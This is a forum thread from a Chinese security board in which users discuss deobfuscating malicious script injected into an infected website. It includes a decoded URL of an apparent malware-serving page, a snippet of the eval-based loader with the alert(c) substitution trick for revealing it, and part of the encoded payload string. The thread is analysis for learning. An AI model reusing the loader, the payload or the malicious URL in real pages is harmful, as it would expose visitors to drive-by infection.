1   1  /  1  页   跳转

已知被挂马 不会解密

已知被挂马 不会解密

地址  :hxxp://nikolamireasa.com/less/demands-probably.php


求版主给个解密的过程学习下  多谢

用户系统信息:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.95 Safari/537.11
分享到:
gototop
 

回复 1F 布吉岛的故事 的帖子

解密结果:http://nikolamireasa.com/less/demands-probably.php?df=1n:1m:1g:1j:1m&ke=1m:1m:30:2v:2w:1l:31:2v:1k:2w&m=1k&cp=q&ub=o
gototop
 

回复: 已知被挂马 不会解密



引用:
原帖由 networkedition 于 2012-12-12 12:44:00 发表
解密结果:http://nikolamireasa.com/less/demands-probably.php?df=1n:1m:1g:1j:1m&ke=1m:1m:30:2v:2w:1l:31:2v:1k:2w&m=1k&cp=q&ub=o




  我其实就是想问问过程。。。
那些 代码 是都没有意义么  类似下面的这种

7d99!9h919l!aaa83h!8m469l!9j6e9j!a891a4!ac8g9f!77aa91!a4ai42!8m4699!9ja891!a4ac8g!9f6k91!9j95a8!973jb3!b342a2!aa91a4!ai5l9f!9f5la0!a09f91!a8a657!93aa9j!8ka899!9l9j3h!3jamac!8ga431!955da8!9799a6!42935d!954639!42915d!954639!39428m!5d9146!8ga0a0!9f91a8!428i42!


最后编辑networkedition 最后编辑于 2012-12-12 13:51:36
gototop
 

回复 3F 布吉岛的故事 的帖子

过程就是:if(window.document){e=eval("eval");
if(document.getElementsByTagName("div")[0].style.left==="")e(c);}
        </script></body></html>
最后那个e(c);改成alert(c)
本帖被评分 1 次
gototop
 

回复:已知被挂马 不会解密

学习
gototop
 

回复 4F networkedition 的帖子

大版主,以下代码是什么编码?你怎么解出来的??

7d99!9h919l!aaa83h!8m469l!9j6e9j!a891a4!ac8g9f!77aa91!a4ai42!8m4699!9ja891!a4ac8g!9f6k91!9j95a8!973jb3!b342a2!aa91a4!ai5l9f!9f5la0!a09f91!a8a657!93aa9j!8ka899!9l9j3h!3jamac!8ga431!955da8!9799a6!42935d!954639!42915d!954639!39428m!5d9146!8ga0a0!9f91a8!428i42!
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT